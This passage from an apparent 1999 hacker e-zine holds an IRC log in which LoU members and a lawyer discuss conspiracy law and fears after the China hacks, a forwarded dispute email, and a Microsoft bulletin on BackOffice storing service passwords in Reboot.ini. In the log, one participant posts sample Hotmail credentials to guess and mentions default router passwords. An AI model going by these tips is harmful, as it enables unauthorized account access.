[04:06] <optiklenz> heh
[04:06] <optiklenz> 250k?
[04:06] <Winn> Is that RICO?
[04:06] <delam> yeah, that's one I remember
[04:06] <optiklenz> hrmm I can grab some k's out of the ole alphabet soup
[04:06] <dyslexia> Father, at this point, regardless of what lou has said=
,
without the help of a rather emphatic media, this whole issue would have
gone nowhere, the whole thing has been hyped and kept alive by the media,
suerly this cannot be construed as a crime on our part
[04:06] <Father> No, general conspiracy statute.
[04:06] <optiklenz> but i dont know about doing crime for something I did=
nt
know was going on
[04:07] <optiklenz> crime=3Dtime
[04:07] <optiklenz> Im fallin asleep here
[04:07] <DigiEbola> hm
[04:07] <maquis> the way this administration is going, there may just be=
a
conspiracy statute..... :)
[04:08] <optiklenz> conspiracy of what?
[04:08] <m0f0> this is more getting to a discussion
[04:08] <Father> Whether you knew something was going on or not is a fact
question. As is whether you wanted to encourage something to go on, even=
if
you didn't know it actually did. Both of those can be conspiracy
liabilities.
[04:08] <delam> so is the real issue the ability to identify an individua=
l
on the internet who's making claims or speaking for others? How much pro=
of
is there of this and have you guys tried to learn the real name etc of th=
e
guy who did say this stuff.
[04:08] <optiklenz> conspiracy of saying that we dont agree on certain
issues?
[04:08] <datapleX> I thought conspiracy was only against your own country=
?
[04:08] <maquis> anything...hell, not to start a new can of worms, but lo=
ok
at the crypto debate and privacy rights. 'nuff said...and DON'T start a
crypto-chat debate! :)
[04:08] <Father> Wrong. Two prongs in general conspiracy stattue.
[04:09] <optiklenz> delam> theres a polish group, and a few other groups
from out of the u.s
[04:09] <optiklenz> they are the ones that are attacking these sites
[04:09] <optiklenz> not us
[04:09] <optiklenz> we wanted to speak out and make things known and noth=
ing
more
[04:09] <optiklenz> and that is all we did
[04:09] <Father> First prong: conspiracy to deprive the US gov. of some
right to function.
[04:09] <lothos> dataplex: that's treason man
[04:09] <optiklenz> something we didnt do
[04:09] <Father> Second: conspiracy to violate a law on the books, no mat=
ter
who the victim is.
[04:10] <m0f0> can't we just buy a law book or something?
[04:10] <optiklenz> another thing we have yet to do
[04:10] <delam> father: did the hacker that did make claims in the name o=
f
this group commit any crimes taht you know of?
[04:10] <Winn> Is hacking China illegal? OR Iraq?
[04:10] <optiklenz> Why ask us?
[04:10] <DigiEbola> well, lets take a step away from us liabilities a mom=
ent
and focus on .cn actions, you ppl seem to have some insight that they are
wanting to get rid of us
[04:10] <optiklenz> We did none of that
[04:10] <lothos> i agree digi
[04:10] <Father> Conspiracy to get unauthorized access to computer is cri=
me,
no matter who victim is, even Iraq or Iran or Ireland.
[04:11] <DigiEbola> i am more worried about .cn then .us
[04:11] <lothos> father, even .jp? Hacking isn't illegal in japan i
thought...
[04:11] <m0f0> then they will thing of something to put you in jail for
[04:11] <datapleX> loth: depends on where the hack originates from
[04:12] <Father> As long as Japanese computer is hooked up to a computer =
in
US, hacking into the Japanese computer is US crime.
[04:12] <Winn> I suggest that .cn doesnt 'get' it completely. They try to
ban sat dishes and now the death penalty for $34K in hacking a bank. Mayb=
e a
call for detente is called for here.
[04:12] <delam> perhaps transport of illegally acquired information from =
any
other country would be considered illegal by us law?
[04:12] <lothos> what if i hack a .jp computer from another .jp computer?
would that be illegal? (sorry to stray off topic here..)
[04:12] <maquis> delam, HTF are you gonna enforce that one? that's amost =
as
funny as something AG Reno would say!!!
[04:13] <Father> I'll punt on your last question, delam: too fact specifi=
c.
[04:13] <optiklenz> groups run by little kids with names like HcV, Tougon=
g
(individual), NIS, Polish Hackers against China, spl0it are the ones doin=
g
all the illegitimate protest
[04:14] <Father> Lothos, depends on whether hacked computer is connected
(indirectly) to computer in US. Hey, what omputer worth hacking ain't on
the Inernet?
[04:14] *** Quits: Mark668 (Read error to
Mark668[adsl-209-78-192-20.dsl.pacbell.net]: EOF from client=0F)
[04:14] <optiklenz> heh
[04:14] <lothos> so if i'm physically on u.s. soil then it'd be a crime?
[04:14] *** Joins : Mark668 (irc@*!*.pacbell.net)
[04:14] <Father> P.S. I may sign off for a while. If I do, I'll be back.
[04:15] <optiklenz> lothos> no
[04:15] <optiklenz> If you log into a system that is based in japan
[04:15] <optiklenz> and from that system access another its not illegal
[04:15] <Father> Yep. Question is whether anyone would prosecute. If Jap=
an,
Inc. asked, someone might.
[04:15] <optiklenz> or maybe it is
[04:15] <optiklenz> heh
[04:16] <m0f0> "heh"
[04:16] <Winn> According to FBI, they can git ya for hacking intl based u=
pon
some interpretation of #1030/1029
[04:16] <optiklenz> ah
[04:16] <optiklenz> ok
[04:16] <feur> IMHO, a more subtle question at this point is what if acti=
ons
will .cn and Iraq take legally or illegally
[04:16] <optiklenz> what can they do?
[04:16] <optiklenz> we've done nothing to any systems in .cn or iraq
[04:16] <optiklenz> plus iraq is not even setup to a global network
[04:17] <optiklenz> and most of their internal networks are probably blow=
n
to shreads by now
[04:17] <Father> Remember, at the base level, jurisdiction is merely powe=
r;
like code is merely bits.
[04:17] <feur> the purported threat to those countries systems
[04:17] <maquis> iraq doesn't have much in the way of connectivity outsid=
e
the nation....
[04:17] <optiklenz> not even via tymnet
[04:17] <Winn> Sometimes the best way to disguise is to emphasize. I stil=
l
think you need to get LOUD AND CLEAR about what you're really about.
[04:17] <optiklenz> and the only x.25 they've heard of is pocket change
[04:18] <feur> optik, x.25 and sna, is generally out of the reach and gr=
asp
of today's hax0rs
[04:18] <delam> fact #1: it's hard as hell to prove any crime on the
internet, and I'm sure you all know that, therefore #2, you're not worrie=
d
about any LEGAL actions by china or the US but you're more worried about =
non
legal actions
[04:18] <DigiEbola> exactly
[04:19] <DigiEbola> it may be not only to off us, but to test the us gov
[04:19] <DigiEbola> if one of us got killed, what would the us do?
[04:19] <optiklenz> as i stated what if some chinese loyalist gets the wr=
ong
idea and decides to use our heads as hunting trophies
[04:19] <optiklenz> theres not much they could do
[04:19] <lothos> I personally am worried about what .cn would do to us,
legally or not.
[04:20] <feur> optik, it would not be a chinese loyalist, it would organi=
zed
chinese gangs
[04:20] <optiklenz> yeah
[04:20] <optiklenz> thats something to worry about
[04:20] <Mark668> Excuse me, I have to disappear for a while ... I'll be
back ... I got a message from Betty that I was expected to "say" somethin=
g
... if someone would let me know what I'm supposed to say, please private
chat me.
[04:20] <optiklenz> Mark> who are you again?
[04:21] <maquis> most of the .cn gangs alrady operate her in the states...
[04:21] <delam> There is a reverse philosophy but it sounds insane, it's =
a
people-buffer-overflow.. if more people started hacking china, the number=
of
targets that china would go after would increase beyond what they could h=
ave
the man power to handle
[04:21] <optiklenz> yeah thats the thing
[04:21] <DigiEbola> they have a lot of people
[04:21] <optiklenz> people totally blew what we said out of proportion
[04:22] <Father> Any one gonna be at CFP99?
[04:22] <delam> I wish
[04:22] <optiklenz> Father> nope
[04:22] <maquis> maybe if i can get away from work...always a problem the=
se
days....
[04:22] <lothos> anyone gonna be at RootFest? :)
[04:22] <optiklenz> I'll be lecturing at rootfest though
[04:22] <Winn> Via vidtel
[04:22] <delam> rootfest in MPLS?
[04:22] <lothos> so is winn via video conf
[04:22] <optiklenz> yes
[04:22] <Mark668> I'm an freelance writer and consultant (see
http://www.gibbs.com/mgbio.htm for a ... well, bio) I write for Network
World (the weekly Backspin column and, starting on the 25th, a weekly
feature called "Gearhead".
[04:23] <lothos> that reminds me, winn.. we need to tlak about that still
[04:23] <lothos> talk
[04:23] <Winn> tomorrow!
[04:23] <Father> Signing off. Be back. - Father, aka Padre ;-)
[04:23] <delam> heh :)
[04:23] <lothos> sure
[04:23] <optiklenz> mark> ok
[04:23] <DigiEbola> hm
[04:23] <lothos> I'll give you a call
[04:23] <feur> what can winn and local friends and...., do and gain
permission from LOU, to assert some risk management in this somewhat jade=
d
affair
[04:23] <Winn> thanks... > noon
[04:24] *** Quits: Father (Leaving=0F)
[04:24] <optiklenz> What can you do?
[04:24] <lothos> I have a class at noon... would 1pm work CST?
[04:24] <Winn> yep!
[04:24] <lothos> cool, 1pm CST then.
[04:24] <maquis> make it so, Mister Winn..... :)
[04:25] <DigiEbola> options options options
[04:25] <feur> 1. establish a unified position
[04:25] <feur> 2. control disseminations to the media
[04:26] <delam> passively time is the best option, actively that's
difficult.. the media is the best option I can think of actively
[04:26] <feur> 3. establish some DC international attorney to act as buff=
er
[04:26] <Winn> You need to have a SINGLE mouthpiece if you really want to
control the message. Or have a bunch of folks sign the same one.
[04:27] <optiklenz> I think getting an attorney would only make people th=
ink
we have reason to be afraid like we did something criminal that justifies
having one
[04:27] *** Quits: MsInfoWar (Ping timeout for
MsInfoWar[1Cust33.tnt4.st-petersburg.fl.da.uu.net]=0F)
[04:27] <feur> optik, the right attorney only acts as a buffer, not an
admission ogf guilt
[04:27] <optiklenz> Well if i can find an attorney i can afford i'll look
into it
[04:28] <Winn> Try the EFF maybe or EPIC or the CDC
[04:28] <DigiEbola> .cn would care less if we have a attorney
[04:28] <DigiEbola> heh
[04:28] <delam> If you all did a press conference and were serious about =
it,
a lawyer would be great to help decide what needs to be said.
[04:28] <feur> i took the liberty of contacting an old acquaintance from =
the
DOJ, who is in private practice in Boston, well known, and would pro bono
look into the whole
[04:29] <optiklenz> ok well this is a conference with out the "press"
[04:29] <optiklenz> frankly Im tired of having people get things wrong
[04:29] <optiklenz> not only has it hurt me, but it's done a great deal t=
o a
lot of other people
[04:30] <DigiEbola> ppl will see what they want to see
[04:30] <feur> but optik, tonight we hear from you, what do the other
members of LOU want to do
[04:30] <optiklenz> We are here as representatives of the group
[04:30] <optiklenz> We've takin what they think, and what they want into
consideration, and we are giving it to you
[04:30] <optiklenz> as a whole
[04:31] <DigiEbola> part of the reason, the press blew this up, is becaus=
e
THEY wanted to see someone break stuff in those countries
[04:31] <optiklenz> can we take a 5minute bathroom break?
[04:31] <feur> i think the next step would be to set up a VMB to chat
[04:31] <delam> alliance teleconference? :)
[04:31] <delam> ..memories
[04:31] <Winn> Free from GTE?
[04:32] <optiklenz> great, be back then.
[04:32] <delam> winn: now now! shh
[04:32] <Winn> heh
[04:32] <feur> gte, good stock, lol
[04:32] <maquis> naughty boy
[04:32] <DigiEbola> brb
[04:32] <kInGb0nG> brb
[04:32] <Winn> brb?
[04:32] <maquis> be right back..
[04:32] <kInGb0nG> be right back
[04:32] <maquis> <d'oh!
[04:32] <Winn> slap me! :)
[04:32] <maquis> < -- SMACKS WINN
[04:32] <maquis> hehehehe
[04:33] <Winn> damn that stings
[04:33] <maquis> btw, winn,nice article on strikeback this week....nice
resaerch...
[04:33] <Winn> you should see the hate mail! INcluding the Pentagon!!!
[04:33] * delam agrees
[04:33] <DigiEbola> back
[04:33] *** Joins: hjghjkghk (~jailednot@*!*.co.nz)
[04:33] *** Quits: dyslexia (Ping timeout for
dyslexia[p34-max2.dun.ihug.co.nz]=0F)
[04:33] <maquis> winn - wonder why heheheehehe
[04:33] *** hjghjkghk is now known as dyslexia
[04:33] <maquis> does Rome Labs ring a bell? :)
[04:33] <optiklenz> ok im back
[04:33] <Winn> heh
[04:34] <dyslexia> air force base isn't it?
[04:34] <Winn> yup
[04:35] <feur> optik, what can winn and company disseminate of tonight's
chat, you set the rules
[04:35] *** Quits: kInGb0nG (Ping timeout for
kInGb0nG[dayoh-a242.gemair.com]=0F)
[04:36] *** Joins: kInGb0nG (~lil_b0ng@*!*.com)
[04:36] <optiklenz> ok
[04:36] *** cd is now known as Nikkita
[04:36] <optiklenz> just what we've been talking about
[04:36] <lothos> as far as I care, you can disseminate any/all of it
[04:36] <Winn> OK: I view this as a PR problem with some potential bad
downside. Whatever you decide, it really needs to be coherent and absolut=
ely
unambiguous.
[04:36] <optiklenz> people need to know that we are not the bad guys
[04:36] <optiklenz> Winn> we can edit some things out
[04:36] <feur> optik, can you provide one summary statement on behalf of =
the
LOU
[04:37] <optiklenz> this can be a joint statement from Inforwar, Infosec,
and LOU
[04:37] <optiklenz> if thats the way you want it
[04:37] <Winn> If we take that route, I will edit it, then pass it to yo =
for
approval.
[04:37] <feur> no, what do you want
[04:37] <optiklenz> s/inforwar/infowar
[04:37] <dyslexia> whatever will require being signed by all memebers etc
[04:37] <lothos> sounds good winn
[04:38] <maquis> < - signs in spirit
[04:38] <optiklenz> =3D]
[04:38] <DigiEbola> heh
[04:38] <optiklenz> thanks marquis
[04:38] <Nikkita> Optik: thnx to so cold 'hackers' talking negatifly in t=
he
MEDIA about LOU, youre scratched, but If you didn't though an IP of that
countries there is nothing to be afraid of
[04:38] <optiklenz> we did nothing
[04:38] <optiklenz> marquis, and nikkita
[04:38] <optiklenz> heh
[04:38] <optiklenz> sounds like a match made in heaven
[04:39] <Winn> I suggest I send to OPT, let him and I work out the edits
then he adds the names he wants to add, and we all distribute tonights
conversation PLUS a 1 pafge statement.
[04:39] <Nikkita> optik: so there is nothing to afraid of.
[04:39] <maquis> mmmm....nikita..... LOL
[04:39] <optiklenz> winn> that works for me
[04:39] <Nikkita> maquis: I kill also :P
[04:39] <optiklenz> everyone else fine with that?
[04:39] <Winn> Send me your contact stuff, and I will get to it AM. You h=
ave
my voice #. ?
[04:39] <maquis> You don't know me, then. :-)
[04:40] <DigiEbola> hm
[04:40] <optiklenz> Winn> no
[04:40] <maquis> heheeheh
[04:40] <Nikkita> optik: Other issue
[04:40] <DigiEbola> we should do a teleconference
[04:40] <Winn> It would be useful to have some form of ID for the
participants, even if it is anonymous. Can you do OPT?
[04:40] <optiklenz> can i do what?
[04:40] <Nikkita> optik: I red what father said about criminal organisati=
ons
[04:40] <optiklenz> heh
[04:41] <optiklenz> Winn> if you mean card everyone
[04:41] <optiklenz> im sure i can work something out
[04:41] <Winn> heh... no, I don't want to get things wrong, tho.
[04:41] * optiklenz use to be really cool with a few of the local bouncer=
s
[04:41] <optiklenz> =3D]
[04:41] <delam> hahah
[04:41] <feur> winn, needs some of identification and authentication, or =
he
is dead as a journalist
[04:41] <Nikkita> optik: but If someone hacks something where goverment h=
as
a investigestion of spionage activity going on, then they will find
you/already found you.
[04:42] <optiklenz> Winn> mail me at optik@legions.org
[04:42] <optiklenz> and i'll respond
[04:42] <optiklenz> if you want you can have my pgp key
[04:42] <feur> nikkita, i can assure all associated members of LOU are
known, down to their dental records
[04:42] <lothos> my email is lothos@trifid.net, pgp key is available from
www.rootfest.org
[04:42] <maquis> feur - now THAT'S class!
[04:42] <Winn> OPT" if we can talk voice, I can tape a statement as well.
You can call me if you want. Use PGP, mine is on the PGP server.
[04:42] <lothos> down to our dental records???
[04:42] <feur> assure that associated intelligence agencies
[04:43] <Nikkita> feur: In that case they did something wrong :)
[04:43] <DigiEbola> digi@wintermute.unixgeeks.com
[04:43] <optiklenz> Winn> heh
[04:43] <feur> if you have no teeth, lol
[04:43] <Nikkita> Feur: I can assure you that nobody knows about M0f0
[04:43] <Nikkita> feur: That's a advice :)
[04:43] <optiklenz> i'm not to excited with the idea of having a voice
statement passed around and archived
[04:44] <DigiEbola> hm
[04:44] <DigiEbola> im still hazy about a bunch of fat guys goin thru my
records
[04:44] <optiklenz> haha
[04:44] <feur> nikkita, you misunderstood my statement
[04:44] <Winn> Fine. You make the call. No prob!
[04:44] <optiklenz> Winn> trust me on this one bro
[04:44] <Nikkita> optik: I there tapping you, there's no way to check tha=
t.
[04:44] <optiklenz> nikk> actually there is
[04:45] <optiklenz> and if they've got a dnr on my line i can very well f=
ind
out too
[04:45] <Nikkita> feur: Well I will let my teeths removed tomorrow or so =
:)
[04:45] <feur> lol
[04:45] <delam> heh
[04:45] <maquis> I know a good dentist that doesn't ask any questions...r=
oad
trip to London! :)
[04:45] <maquis> heheehehe
[04:45] <Winn> So, tomorrow, we exchange some email... build your story...
and we agree not to release until we are all in agreement with it, and yo=
u
have it 'signed' by your folks.
[04:45] <Nikkita> Optik: just trust me on that.
[04:46] <optiklenz> Winn> thats the deal
[04:46] <Winn> Perfect. Agreed.
[04:46] <Nikkita> Maquis: London is just 30 minutes from Amsterdam, pleas=
e
mail me the adres :)
[04:47] <Nikkita> Maquis: Is he expensive :)
[04:47] <maquis> HAR! Nikkita, super spy of the 90s should be able to fin=
d
it.....!
[04:48] <Nikkita> maquis: www.dental.record.org ---> www.illegal.dentist.=
com
[04:48] <delam> heh
[04:48] <optiklenz> well folks
[04:48] <maquis> yep, that's him... :)
[04:48] <Nikkita> maquis: ever seen a blond without theet
[04:48] <optiklenz> if thats all i'll be out for the night
[04:48] <maquis> < -- heading out in a bit himself.
[04:49] <delam> yeah winn you sleeping?
[04:49] <DigiEbola> I must concur with my associate
[04:49] <optiklenz> we'll keep in touch
[04:49] <optiklenz> =3D]
[04:49] <maquis> seeya opti
[04:49] * Nikkita is going to sleep for 4 ours, because he has a milleniu=
m
update around 5 ours....
[04:49] <DigiEbola> later all
[04:49] <maquis> later later and even later!
[04:50] <kInGb0nG> later
[04:50] <datapleX> so maquis...gonna hook me up wif an internic account? =
;)
[04:50] <feur> thank you all for coming on and trusting a bit
[04:50] *** Quits: kInGb0nG (the king has left the building=0F)
[04:50] *** Quits: DigiEbola (Leaving=0F)
[04:50] <maquis> feur: no prob...
[04:50] *** Quits: datapleX (later...=0F)
[04:50] <Winn> Gentlemen! Thanks ... OPT - not to worry. Tomorrow!
[04:50] <delam> nice meeting you guys
[04:50] <Nikkita> maquis: and a hit2000.org :)
[04:50] <maquis> Later all -- thanks for the invite
[04:50] <optiklenz> sure thing
[04:50] <maquis> hey, we DO the domain names.... :)
[04:50] <delam> check out my cute portrait on the spring issue 1996 of 26=
00
if you like :)
[04:50] *** Quits: optiklenz (eprom=0F)
[04:50] *** Parts: Winn (Winn@1*!*.uu.net)
[04:51] <Nikkita> maquis: I will mail jou a zone file then :) or give me =
the
IP of root nameserver :)
[04:51] <maquis> heehe...NOT!
[04:51] <Nikkita> maquis: ptr would do :)
[04:52] <maquis> ptr? as in comPuTeR?
[04:52] <Nikkita> ptr record :)
[04:52] <delam> char *ptr; ?
[04:52] <Nikkita> uh... know linux?
[04:52] *** Joins: Father (Agrosso@170.*!*.att.net)
[04:52] <maquis> Ahhh...leee-nux....
[04:52] * Nikkita tells everyone about DNS howto :)
[04:53] <maquis> << - NT (ack!) person
[04:53] <feur> ptr as in polish hax0r crew
[04:53] <Father> Have I missed anything
[04:53] <delam> like jurassic park "Eye Know Yooooooo neeekz"
[04:53] <Father> Where is Winn?
[04:53] <delam> he left
[04:53] <feur> winn, going to sleep
[04:54] <Nikkita> Farther: In the Netherlands is privacy exposed trough a
software bug not punished,
[04:54] <delam> wrapping it up right now father
[04:54] <maquis> I'm heading off, all. Thanks for the invites, keep yer
heads down, chins up, and....
[04:54] <maquis> ...lets be careful out there.
[04:54] <Nikkita> If I use an in America located router to connect to a
server in The Netherlands, and USE a bug
[04:54] <maquis> Night all...rick....
[04:54] <Nikkita> could I be convicted in America?
[04:54] *** Quits: maquis (Leaving=0F)
[04:55] <delam> it's indirect, data still was used from america to perfor=
m
the action... he mentioned indirect before
[04:55] <Father> I'm not clear on the question
[04:55] <Nikkita> delam: I'm stationed in the Netherlands.
[04:56] <delam> so american property was involved in a crime?
[04:56] <Nikkita> Could I be convicted cause I used in USA stationed
equipment.
[04:56] <Nikkita> delam: nope, just the connection
[04:56] <Father> What does "in USA stationed equipment"?
[04:56] <Nikkita> it has IP traffic, which I use
[04:57] <Nikkita> delam: typing cisco as a password in a Cisco router isn=
't
hacking...
[04:57] <delam> heh, there's alot of definintions to hacking, I agree
[04:58] *** Quits: lothos (g'night=0F)
[04:58] <dyslexia> heh, it might not be hacking, but it is truly sad how
often it works
[04:59] <Nikkita> Father: a router is located fysical in USA, I connect t=
o
that, en then will from ther connect to a server in the Netherlands,
[04:59] <delam> that's the state of the world with technology
[04:59] <Father> Bottom line: (1) authorized access; (2) on computer
connected to Interent; (3) where there is "some" connection to U.S. or
Inernational seas, air, shops, or the like, equals prosecutable crime in
US., even you and computer(s) never step foot on US soil. Gabish? Broad
statute.
[04:59] <Father> Nikkita: Yep. You got warrant.
[04:59] <Nikkita> father: but I don't do a crime in the Netherlands..
[04:59] <delam> authorized access is the key to this issue.. if authorize=
d
isn't stated and you guess a password and get in.. have you committed a
crime? I'd say no
[05:00] <Nikkita> delam: I say no ...
[05:00] <Father> So? Its not Netherlands statute. Its US statute.
[05:00] <Father> Delam: Guessing password and using it is unauthorized
access.
[05:00] <Nikkita> Try this for an example at Hotmail...
[05:00] <Nikkita> user: john2
[05:00] <Nikkita> pass: john
[05:00] <Nikkita> user: hank2
[05:00] <Nikkita> pass: hank
[05:01] <Father> No thanks.
[05:01] <feur> father, what about statute interpreation, that without
warning banner, there is no unauthorized entry, all entry is fine
[05:01] <Nikkita> just by guessing...
[05:01] <delam> the problem with internet protocols are taht certain TCP/=
IP
ports do not have the ability built into the protocol to post a banner..
therefore, the issue of "authorized" can never be established by the pers=
on
running the computer
[05:02] <Father> Feur: Wrong. That warning banner issue has to do with
whether the US government can monitor you without a warrant.
[05:02] <feur> or "rights without remedy"
[05:02] <delam> if there is a banner on port 23 taht says "you must work
here to enter" and a hacker finds port 21 with no banner and enters, even
while guessing a passowrd, have they committed a crime?/ the couldn't see
any sign that said "keep out"
[05:02] <Nikkita> feur: in Scandinavian countries they MUST have fysical
saying that you may not enter whitout authoring.
[05:03] <Father> Sign that says keep out is not imortatnt. Sign that say=
s
come on in is.
[05:03] <Father> sorry
[05:03] <Father> (Hey, feds are tough.)_
[05:03] <delam> how do you establish "authorized access" when a computer =
has
been connected to a public network without any signs?? I'd say that impli=
es
it's meant for the public
[05:04] <feur> interesting you say that father, my partner is a crimianl
attorney in boston, and is defending an elctronic perimeter intrusion
[05:04] <Father> Depends on what the purpose of it being connected is.
[05:04] <Nikkita> delam: just like sending mail to another country, that
packets will travell along dosen systems without asking for permission
[05:04] <delam> you're posed with the problem taht you cannot from the
outside determine what it's purpose is, but your intent is to enter
[05:05] <Father> Who is your partner?
[05:05] <Nikkita> partner?
[05:06] <Father> Fleur: who is your partner?
[05:06] <Father> Savage? Silverglate?
[05:06] <feur> check your message window
[05:06] <delam> it's an interesting debate that I haven't seen any clear =
cut
legal answers for
[05:07] <Nikkita> btw: does anyone know about research in hacks commited =
in
USA and outside of the USA
[05:08] <feur> nikkita, check nexus
[05:08] <Nikkita> I have the feeling that it 's easer to hack in the USA,
cause the high penalties companies don't do alot of there securityes
[05:08] <Nikkita> www.nexus.com?
[05:08] <Nikkita> or lexus nexus
[05:09] <feur> the db lex nex
[05:09] <Father> Time for me to go. Feel free to contact me, agrosso@xxx.org
[05:09] <Nikkita> good morning :)
[05:09] <dyslexia> thanks Ftaher
[05:09] <Nikkita> feur: nexus is a security audit tool like satan
[05:09] <dyslexia> Father
[05:10] <feur> no, private db lex
[05:10] <Nikkita> feur: I'll check on that, just have to find a working
account :)
[05:13] <Nikkita> to all LoU members still here, don't let that affaire
helding you of.
[05:13] <Nikkita> You did fine in the past remember that.
[05:13] *** Quits: Father (Ping timeout for
Father[170.arlington-04.va.dial-access.att.net]=0F)
[05:15] <Nikkita> Mark: If your are in Holland in June come and look us u=
p
[05:15] <Nikkita> Dutch scene will have a 3 day during party
[05:16] <Nikkita> CCC, Rop Gongrijp and maybe some L0pth members
[05:16] <Nikkita> will be ther
[05:18] <feur> ok ladies and gentlemen the marat sade is over tonight,
please come back to the asylum
[05:20] <Nikkita> feur: good bye
[05:20] <Nikkita> sleep tighyt
[05:20] *** Quits: Nikkita (Leaving=0F)
[05:22] <feur> goodnight mofo nikkita
[05:24] *** Quits: feur (irc, where is the wizard of OZ=0F)
[05:25] <delam> I'm going to shut the server down in a couple minutes
[05:25] <dyslexia> bye all
[05:26] *** Quits: dyslexia (Nuke a gay whale for Jesus!=0F)
[05:27] *** Disconnected
Session Close: Wed Jan 20 05:27:08 1999
<snip>
--
See Ya!
RuffNeck
---- --- -- -
ruffneck@xxxxxx.xxx
Prior to posting this here I contacted Bronc Buster and he was kind enough
to get back to me with some of the inside story on what happened and why..
this is his message with only slight modifications:
Delivered-To: dok-cruciphux@dok.org
Date: Fri, 12 Feb 1999 15:02:34 -0500 (EST)
From: Bronc Buster <bronc@xxxxxxx.com>
To: cruciphux <cruciphux@dok.org>
cc: contact@hackernews.com
Subject: Re: irc log
In-Reply-To: <19990212152545.SUKT27696.mail.rdc1.on.home.com@azazel.n0where.org>
Message-ID: <xxx>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
I thank you for contacting someone and telling us about this. I'll tell
you what this log is, and what it is about. The l00zerz over at Infowar
decided they wanted to try and get a peace of the LoU story, so they
offered to organize a 'secret' meeting with 'professionals' in the
security and intelligance world to offer us advice after the China hacks
because it was confermed that the Chinese Govt sent out a memo to some
internal security group and told them to 'actively' look for me and
Zyklon.
Because Winn knows that I know he is nothing but a fake, he tried to
exclude me and Zyklon from the meeting altogeather. As you can see from
the logs it worked. Once I had been told by other LoU members about it I
contacted Winn and Betty asking what this was all about. They said it was
nothing and was not going to happen and to not be concerned.
As you can see they conspired with the rest of LoU to exclude me (maybe
Zyklon as well) so that they could have this meeting. What they talked
about I had no idea until I saw this log. I was told it never took place.
It's funny, me and Zyklon were the people in hot water, and we were the
ones not included. It's a case of nothing more then the people at Infowar
wanting a peace of a big story and getting their grubby hands into this
whole mess.
I don't want to say anything negative about LoU, so suffice it to say, I
am no longer affiliated with LoU in any way, shape or form.
If you want to print any of this in your news letter, or if HNN wants to
print any of this you may, with the exception of anything that I may of
let slip out about LoU, or any negative comments against LoU. We parted
ways, you guys can see the BS that surrounded it..
Again, thanks for contacting me
regards,
†† Bronc Buster
<snip>
'Nuff said on this story I think... thanks to Bronc Buster for clearing
some of this scenario up, and others for advice on 'handling' you know
who you are, also Ruffneck for the log. - Ed
@HWA
5.0 Microsoft advisories
~~~~~~~~~~~~~~~~~~~~
[] Back office server 4.0
Approved-By: secnotif@MICROSOFT.COM
Date: Fri, 12 Feb 1999 12:42:57 -0800
Sender: Microsoft Product Security Notification Service <MICROSOFT_SECURITY@ANNOUNCE.MICROSOFT.COM>
From: Microsoft Product Security <secnotif@MICROSOFT.COM>
Subject: Microsoft Security Bulletin (MS99-005)
To: MICROSOFT_SECURITY@ANNOUNCE.MICROSOFT.COM
Microsoft Security Bulletin (MS99-005)
--------------------------------------
>BackOffice Server 4.0 Does Not Delete Installation Setup File
Originally Posted: February 12, 1999
Summary
=======
> Microsoft (R) has learned of a potential vulnerability in the installer for
> BackOffice Server (R) 4.0. The installer asks the user to provide the
> account userid and password for selected services and writes these to a file
> in order to automate the installation process. However, the file is not
> deleted when the installation process completes. As detailed below,
> Microsoft recommends that BackOffice 4.0 customers delete this file.
Microsoft has received no reports of customers being adversely affected by
this problem. However, it is releasing this security bulletin in order to
proactively provide customers with information about the problem in order to
allow them to take steps to ensure their safe computing.
Issue
=====
When a user chooses to install SQL Server (R), Exchange Server (R) or
Microsoft Transaction Server (R) as part of a BackOffice 4.0 installation,
the BackOffice installer program requests the name and password for the
accounts associated with these services. Specifically, it asks for the
account name and password for the SQL Executive Logon account, the Exchange
Services Account, and the MTS Remote Administration Account. These values
are stored in <systemdrive>\Program Files\Microsoft Backoffice\Reboot.ini,
and used to install the associated services.
BackOffice Server does not erase this file when the installation process is
completed. This is true regardless of whether the installation process
completes successfully or unsuccessfully. By default, the Microsoft
BackOffice folder is not shared, so network access to reboot.ini generally
does not pose a risk. Users who can log onto the server locally would be
able to access the file, but in most cases this ability is granted only to
selected users such as administrators.
The fix for this problem is to delete the file <systemdrive>\Program
Files\Microsoft Backoffice\Reboot.ini after each BackOffice 4.0
installation, whether successful or not. The file is created only by the
installer, and, once deleted, will not be re-created unless BackOffice 4.0
is re-installed.
Affected Software Versions
==========================
The following software versions are affected:
- Microsoft BackOffice Server 4.0
What Microsoft is Doing
=======================
On February 12th, Microsoft sent this security
bulletin to customers subscribing to the Microsoft
Product Security Notification Service
(see http://www.microsoft.com/security/services/bulletin.asp
for more information about this free customer service).
Microsoft has published the following Knowledge Base (KB) article on this
issue:
- Microsoft Knowledge Base (KB) article Q217004,
†† BackOffice Installer Tool Does Not Delete Password Cache File.
†† http://support.microsoft.com/support/kb/articles/q217/0/04.asp
†† (Note: It might take 24 hours from the original posting of this
†† bulletin for the KB article to be visible in the Web-based
†† Knowledge Base.)
What customers Should Do
========================
Microsoft recommends that customers ensure that they delete the file
<systemdrive>\Program Files\Microsoft Backoffice\Reboot.ini after the
installation program for BackOffice 4.0 completes
More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-005,
†† BackOffice 4.0 Does Not Delete Installation Setup File
†† (the Web-posted version of this bulletin),
†† http://www.microsoft.com/security/bulletins/ms99-005.asp.
- Microsoft Knowledge Base (KB) article Q217004,
†† BackOffice Installer Tool Does Not Delete Password Cache File.
†† http://support.microsoft.com/support/kb/articles/q217/0/04.asp
†† (Note: It might take 24 hours from the original posting of this
†† bulletin for the KB article to be visible in the Web-based
†† Knowledge Base.)
Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please contact
Microsoft Technical Support. For information on contacting Microsoft
Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.
Revisions
=========
- February 12, 1999: Bulletin Created
For additional security-related information about Microsoft products, please
visit http://www.microsoft.com/security
<snip>
Approved-By: secnotif@MICROSOFT.COM
X-Mailer: Internet Mail Service (5.5.2524.0)
Date: Mon, 8 Feb 1999 15:06:09 -0800
Sender: Microsoft Product Security Notification Service <MICROSOFT_SECURITY@ANNOUNCE.MICROSOFT.COM>
From: Microsoft Product Security <secnotif@MICROSOFT.COM>
Subject: Microsoft Security Bulletin (MS99-004)
To: MICROSOFT_SECURITY@ANNOUNCE.MICROSOFT.COM
Microsoft Security Bulletin (MS99-004)
--------------------------------------
Patch Available for Authentication Processing Error in Windows NT (r) 4.0
Service Pack 4
Originally Posted: February 8, 1999
Summary
=======
> Microsoft has released a patch that eliminates a logic error in Service Pack
